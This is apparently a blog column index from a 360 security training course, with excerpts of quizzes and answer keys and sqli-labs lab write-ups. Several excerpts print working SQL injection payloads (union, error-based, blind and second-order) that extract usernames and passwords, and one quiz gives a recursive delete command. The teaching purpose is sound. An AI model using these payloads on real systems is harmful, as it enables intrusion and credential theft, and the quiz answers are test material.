
360实训
文章平均质量分 67
360实训
未名编程
编程爱好者,诗词达人
展开
-
Error: Table ‘bWAPP.users‘ doesn‘t exist
数据库bwapp不存在;这是因为建立数据库的文件不能建立数据库,所以这里我们手动建立一个数据库。首先连接数据库:[root@localhost /]# mysql -uroot -p输入数据库root用户密码Create database bwapp; //数据库名和配置文件中的要一致有了数据库,接下来需要手动建立数据库中的表,并在表中添加数据代码如下:使用数据库bwapp:use bwapp;创建blog表:CREATE TABLE blog ( id int(10) NO.原创 2021-07-21 15:34:08 · 483 阅读 · 0 评论 -
360培训题库14-20
14实训平台未名编程安全入门 · 课程测试00:00:20立即测试1.(单选题) 判断是否是数组的函数是?(1分)A. is_arrayB. isarrayC. if_arrayD. ifarray回答正确 答案解析: 略2.(单选题) 关于php数组下列说法正确的是?(1分)A. 数组的下标必须为数字,且从0开始B. 数组的下标可以是字符串C. 数组中的元素类型必须一致D. 数组的下标必须是连续的回答错误 正确答案为: B, 答案解析:略。3.(单选题) 以下代码输出原创 2021-07-21 13:05:17 · 880 阅读 · 0 评论 -
360培训题库9-13
91.(单选题) HUB是工作在以下哪一层的设备?(10分)A. 物理层B. 链路层C. 网络层D. 传输层回答正确 答案解析: 略2.(单选题) 路由器是工作在以下哪一层的设备?(10分)A. 物理层B. 链路层C. 网络层D. 传输层回答错误 正确答案为: C, 答案解析:略。3.(单选题) 交换机(非扩展类)是工作在以下哪一层的设备?(10分)A. 物理层B. 链路层C. 网络层D. 传输层回答错误 正确答案为: B, 答案解析:略。4.(单选题)原创 2021-07-21 12:52:49 · 467 阅读 · 0 评论 -
360培训题库1-8
1.(单选题) 下列哪个是APT组织海莲花主要的攻击手法:(10分)A. DOSB. SYNC. CCD. 水坑攻击回答正确 答案解析: 略2.(单选题) 下列哪些事件不属于网络攻击事件:(10分)A. 分布式拒绝服务攻击B. 后门攻击C. 软硬件自身故障D. 漏洞攻击回答正确 答案解析: 略3.(单选题) 下列哪个特性不属于信息安全三要素:(10分)A. 机密性B. 持续性C. 完整性D. 可用性回答正确 答案解析: 略4.(多选题) 下列哪个属于APT攻原创 2021-07-21 12:23:50 · 989 阅读 · 0 评论 -
8操作系统基础-试卷
1.(单选题) 对文件重命名的命令为( )(2分)A. rmB. moveC. mvD. mkdir回答错误 正确答案为: C, 答案解析:略。2.(单选题) 如何删除一个非空子目录 /tmp( )。(2分)A. del /tmp/*B. rm -rf /tmpC. rm -Ra /tmp/*D. rm –rf /tmp/*回答错误 正确答案为: B, 答案解析:略。3.(单选题) 显示系统主机名的命令是( )(2分)A. uname -rB. who am iC.原创 2021-07-21 11:50:42 · 687 阅读 · 0 评论 -
7操作系统基础-Shell编程
1.(单选题) 关于awk逻辑判断式,说法错误的是?(10分)A. ~ 匹配正则表达式B. == 判断参数是否相等C. < 判断参数1是否小于参数2D. !~ 不匹配正则表达式回答错误 正确答案为: D, 答案解析:略。2.(单选题) 关于sed操作命令中,说法错误的是?(10分)A. a 命令在行的前面另起一行新增B. p 命令打印相关行,配合-n使用C. c 命令替换行D. d 命令删除行回答正确 答案解析: 略3.(单选题) 以下关于正则表达式的重复字符,说法错原创 2021-07-21 11:46:01 · 962 阅读 · 0 评论 -
4安全意识-试卷
1.(单选题) 下列哪一个不属于电信诈骗?(10分)A. DDOS攻击B. 冒充国家相关工作人员调查唬人C. 虚构退税D. 假称退还养老金、抚恤金回答正确 答案解析: 略2.(单选题) 电信诈骗的特点不包括下列哪个?(10分)A. 犯罪活动的蔓延性比较大,发展很迅速B. 微信C. 诈骗手段翻新速度很快D. 形式集团化,反侦查能力非常强回答错误 正确答案为: B, 答案解析:略。3.(单选题) 电信诈骗识别公式中的因素不包括下列哪个?(10分)A. 汇款、转账要求B. 用原创 2021-07-21 11:42:50 · 496 阅读 · 0 评论 -
3安全法律法规-试卷二
1.(单选题) 《网络安全法》要求网络运营者对保障网络安全运营负有责任,对其产品、服务存在的漏洞要及时采取补救措施,怠于履行义务的,导致个人信息泄露的,将面临最高()万元的罚款;如果是关键信息基础设施的运营者将是最高()万元的罚款。(10分)A. 五十,一百B. 二十,五十C. 十五,三十D. 三十,八十回答正确 答案解析: 略2.(单选题) 在“四川一网站因高危漏洞遭入侵被罚”的案例中违反了网安法的第_____条规定。(10分)A. 18B. 15C. 59D. 19回答错误原创 2021-07-21 11:41:31 · 170 阅读 · 0 评论 -
2安全法律法规-试卷一
1.(单选题) 违反本法第四十四条规定,窃取或者以其他非法方式获取、非法出售或者非法向他人提供个人信息,尚不构成犯罪的,由公安机关没收违法所得,并处违法所得( )以上( )以下罚款,没有违法所得的,处( )以下罚款。(10分)A. 五倍 一百倍 一百万元B. 一倍 十倍 一百万元C. 一倍 一百倍 十万元D. 十倍 一百倍 一百万元回答错误 正确答案为: B, 答案解析:略。2.(单选题) 《网络安全法》规定,网络运营者应当制定(),及时处置系统漏洞、计算机病毒、网络攻击、网络侵入等安全风原创 2021-07-20 14:31:53 · 170 阅读 · 0 评论 -
渗透测试工具使用
1.(单选题) Nmap用来隐蔽扫描的命令是以下哪一选项?(10分)A. -sSB. -sNC. -sFD. -sX回答错误 正确答案为: B, 答案解析:-sS是TCP SYN扫描,-sI是空闲扫描,-sU是UDP扫描,B选项说法正确。2.(单选题) 著名的nmap软件工具不能实现下列哪一项功能?(10分)A. 端口扫描B. 安全漏洞扫描C. whois查询D. 操作系统类型探测回答错误 正确答案为: C, 答案解析:nmap基本功能是探测主机是否在线,其次是扫描端口和探测操原创 2021-07-20 14:28:40 · 81 阅读 · 0 评论 -
360实训考试题(总)
1、drwxr-xr-x ugo分别具有什么权限?drwxr-xr-x ugo分别具有什么权限?通过(chmod)命令修改文件或者目录的权限Linux中使用ifconfig查看网卡配置真题:下列哪个是APT组织海莲花主要攻击手法 (10分)水坑攻击CIA是什么?肯定考!信息安全三要素 机密性 完整性 可用性APT特点 高级、持续性、多针对企业政府(!没有高频!)下列哪个事件属于有害程序事件:1、2、34不对 信息丢失事件网络安全的定义可能会考鱼叉式钓鱼攻击会不会针对特原创 2021-07-20 14:22:52 · 57 阅读 · 0 评论 -
【less-7】sqli-labs靶场第七关(类似less-5)
第七关和第五关相比单引号和双括号,简单构造 一下即可https://sqli.wmcoder.site/sqli-labs/Less-7?id=1')) and ord(mid((select IFNULL(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68--+原创 2021-07-20 11:36:58 · 343 阅读 · 0 评论 -
【less-6】sqli-labs靶场第六关(类似less-5)
第六关和第五关相比就换了个双引号,简单构造 一下即可原创 2021-07-20 11:35:26 · 269 阅读 · 0 评论 -
Burpsuite工具的代理抓包功能实验
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 实验目的实验环境实验原理实验步骤第一步 启动Burpsuite第二步 配置Burpsuite的监听参数第三步 配置Firefox的代理功能第四步 正常访问uoload-labs平台第五步 启动代理方式访问uoload-labs平台思考与总结实验目的通过本实验理解Burpsuite工具代理抓包功能的配置方法,掌握如何利用Burpsuite工具查看request和response信息,熟悉Burpsuite常见功能的使.原创 2021-07-20 10:43:57 · 1738 阅读 · 0 评论 -
sql注入方式
联合查询注入?id=-1'+UNION+SELECT+1,2,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+users)--+报错注入1手动修改 LIMIT+0,1 来进行结果偏移?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))原创 2021-07-19 16:31:18 · 197 阅读 · 0 评论 -
【less-24】基于SQLI的二次注入
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 实验目的实验环境实验原理二次排序注入思路:实验步骤第一步 在kali平台上使用Firefox访问SQLI的less-24实验第二步 注册一个新账号第三步 以账号admin'#密码123456登录后修改密码第四步 以账号admin密码test登录成功思考与总结实验目的通过本实验理解SQL注入中二次注入漏洞引起的原因,如何利用漏洞进行二次注入。实验环境渗透平台:Kali目标网站:SQLI平台实验原理二次排序注.原创 2021-07-19 16:05:32 · 377 阅读 · 2 评论 -
【less-4】sqli-labs靶场第四关
网址https://sqli.wmcoder.site/sqli-labs/Less-4/解法与Less-2类似,直接看这篇文章:【less-2】sqli-labs靶场第二关不同的是,根据错误回显知道,其拼接方式为id=("$id")故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1")采用如下语句获取所有用户名和密码https://sqli.wmcoder.site/sqli-labs/Less-4/?id=1") and 1=2 unio原创 2021-07-19 14:50:18 · 293 阅读 · 0 评论 -
【less-3】sqli-labs靶场第三关
网址https://sqli.wmcoder.site/sqli-labs/Less-3/解法与Less-2类似,直接看这篇文章:【less-2】sqli-labs靶场第二关不同的是,根据错误回显知道,其拼接方式为id=('$id')故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1')采用如下语句获取所有用户名和密码https://sqli.wmcoder.site/sqli-labs/Less-3/?id=1') and 1=2 unio原创 2021-07-19 14:48:22 · 392 阅读 · 0 评论 -
【干货】sql-labs、请求方式、注入类型、拼接方式
原创 2021-07-19 13:26:05 · 186 阅读 · 0 评论 -
sqli注入前置知识
order by -- + 判断字段数目union select -- + 联合查询收集信息id=1′ and 1=2 UNION SELECT 1,2,database() -- + 查询当前数据库id=1’ and 1=2 UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata -- +查询所有数据库id=1′ and 1=2 UNION SELECT 1,2,group_concat(原创 2021-07-19 12:48:05 · 256 阅读 · 0 评论 -
【干货】如何判断 Sql 注入点
注:本文在Jewel591 文章片段的基础上加以实例说明而成 原文链接 1.判断是否存在 Sql 注入漏洞2.判断 Sql 注入漏洞的类型2.1 数字型判断:2.2 字符型判断:3.实例说明less-1数值型方法判断字符型方法判断less-2通常情况下,可能存在 Sql 注入漏洞的 Url 是类似这种形式 :http://xxx.xxx.xxx/abcd.php?id=XX对 Sql 注入的判断,主要有两个方面:判断该带参数的 Url 是否存在 Sql 注入?如果存在 Sql 注入,那么属于原创 2021-07-19 12:25:38 · 14892 阅读 · 9 评论 -
【less-2】sqli-labs靶场第二关
网址https://sqli.wmcoder.site/sqli-labs/Less-8/解法传入id=1查看页面回显https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1原创 2021-07-19 09:26:10 · 2468 阅读 · 0 评论 -
【最详细】Tcpdump使用实验
【原理】【步骤】安装2.常用命令选项2.12.2 查看哪些端口可以抓包2.3 指定接口2.4 -n和-nn2.5 -x和-xx;-X和-XX,最常用的是-XX2.6 -v,-vv答应详细输出,一个比一个详细,看一下吧3.常用过滤字段3.1 过滤指定主机,首先ping下qiyun,看看ip是多少,然后用host过滤,抓到的都是指定host的包3.2 源与目的,src与dst3.3 协议过滤3.4 过滤网段3.5 过滤端口3.6 协议字段过滤【总结】【原理】tcpdump和wireshark一样,是一个抓.原创 2021-07-18 09:40:49 · 841 阅读 · 2 评论 -
【最详细】Wireshark使用教程
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 原理步骤1.安装2.wireshark使用3.先看几个数据包,熟悉一下wireshark4.wireshark过滤规则4.1 地址过滤4.2 端口过滤4.4 其他常用过滤5.流查看6.数据包保存说明总结原理wireshark是一款网络嗅探工具。可以监视网络的状态、数据流动情况以及网络上传输的信息。当信息以明文的形式在网络上传输时,便可以使用网络监听的方式来进行攻击。将网络接口设置在监听模式,便可以将网上传输的源源.原创 2021-07-18 09:29:37 · 32655 阅读 · 6 评论 -
【Less-9】基于SQLI的SQL时间盲注
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 【实验目的】【实验环境】【实验原理】【实验步骤】第一步 登录SQLI-Labs平台第二步 登录Kali平台,启动Firefox浏览器访问SQLI-Labs的less-9第三步 判断注入点与注入类型第四步 获取数据库名的长度第五步 探测数据库其他信息【思考与总结】【实验目的】通过本实验理解SQL时间盲注漏洞的定义方法,掌握基于SQL时间盲注的手工注入方法,熟悉SQL时间盲注存在的原因,掌握SQL时间盲注的防护方法。.原创 2021-07-17 16:09:27 · 733 阅读 · 1 评论 -
【less-5】基于SQLI的SQL盲注常用函数
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 实验目的实验环境实验原理实验步骤第一步 登录SQLI-Labs平台第二步 登录Kali平台,启动Firefox浏览器访问SQLI-Labs的less-5第三步 利用left(a,b)获取信息第四步 利用length函数判断数据库等的长度第五步 利用substr或substring函数获取信息第六步 利用ord()和mid()等函数获取信息第七步 利用延时函数sleep()或benchmark()获取信息第八步 利用Xp.原创 2021-07-17 11:31:01 · 270 阅读 · 1 评论 -
【less-11】基于SQLI的POST字符型SQL注入
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符型SQL注入实验目的通过本实验理解区别SQL注入中GET和POST的区别,掌握POST型SQL注入漏洞的手工注入方法,熟悉Burpsuite软件的使用。实验环境渗透平台:Kali目标网站:SQLI平台上的Less-11实验原理1.POST方式概述使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。2.GET和POST的区别:语义上的区别,get用于.原创 2021-07-17 11:11:39 · 595 阅读 · 2 评论 -
【less-1】基于SQLI的SQL字符型报错注入
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!文章目录实验目的实验环境实验原理实验步骤第一步 登录SQLI-Labs平台第二步 登录Kali平台,启动Firefox浏览器访问SQLI-Labs的less-1第三步 尝试判断是否存在SQL注入以及哪种注入类型第四步 手工SQL注入获得数据库的用户名与密码思考与总结实验目的通过本实验理解数字型报错SQL注入漏洞点的定位方法,掌握利用手工方式完成一次完整SQL注入的过程,熟悉常见SQL注入命令的操作。实验环境渗透主.原创 2021-07-17 10:49:39 · 489 阅读 · 1 评论 -
基于PHPCMS的SQL注入(Havij)
本教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险。目录实验目的实验环境实验原理实验步骤第一步靶机操作第二步渗透主机操作实验总结实验目的通过本实验理解SQL注入基本原理和过程,掌握菜刀和Havij等注入工具的使用方法,了解SQL注入的危害。通过本实验,掌握SQL注入点识别方法、测试方法、自动化工具使用方法以及进行防御的基本方法。实验环境测试渗透机:win2k8SvrTester工具:中国菜刀、Havij目标服务器(靶机):phpcms网站目标网站:http://IP:80.原创 2021-07-17 10:33:34 · 2300 阅读 · 4 评论 -
drwxr-xr-x ugo分别具有什么权限?
文件权限解释权限的计算是除去第一位字母开始,权限都是三个符号为一组合,其中-表示没有这个权限d:第一位表示文件类型。d是目录文件,l是链接文件,-是普通文件,p是管道rwx:第2-4位表示这个文件的属主拥有的权限,r是读,w是写,x是执行。r-x:第5-7位表示和这个文件属主所在同一个组的用户所具有的权限。r-x:第8-10位表示其他用户所具有的权限。...原创 2021-07-16 16:15:24 · 129 阅读 · 0 评论 -
Day2:360培训学习重点笔记(7.14)
中华人民共和国网络安全法原创 2021-07-14 09:59:32 · 226 阅读 · 0 评论 -
Day1:360培训学习重点笔记(7.13)
Day1:360培训学习重点笔记(7.13)一、什么是网络安全?二、信息安全三要素三、信息安全中,人是最薄弱的环节四、APT攻击这里的反复并非高频的APT可能对如下那几条进行攻击:(并不对某一个普通人进行攻击)五、渗透测试与APT的区别...原创 2021-07-13 17:08:11 · 220 阅读 · 1 评论 -
360校企培训:安全导论-试卷
测试一1.(单选题) 下列哪个是APT组织海莲花主要的攻击手法:(10分)A. DOSB. SYNC. CCD. 水坑攻击回答正确 答案解析: 略2.(单选题) 下列哪些事件不属于网络攻击事件:(10分)A. 分布式拒绝服务攻击B. 后门攻击C. 软硬件自身故障D. 漏洞攻击回答正确 答案解析: 略3.(单选题) 下列哪个特性不属于信息安全三要素:(10分)A. 机密性B. 持续性C. 完整性D. 可用性回答正确 答案解析: 略4.(多选题) 下列哪个属于原创 2021-07-13 16:58:29 · 1250 阅读 · 0 评论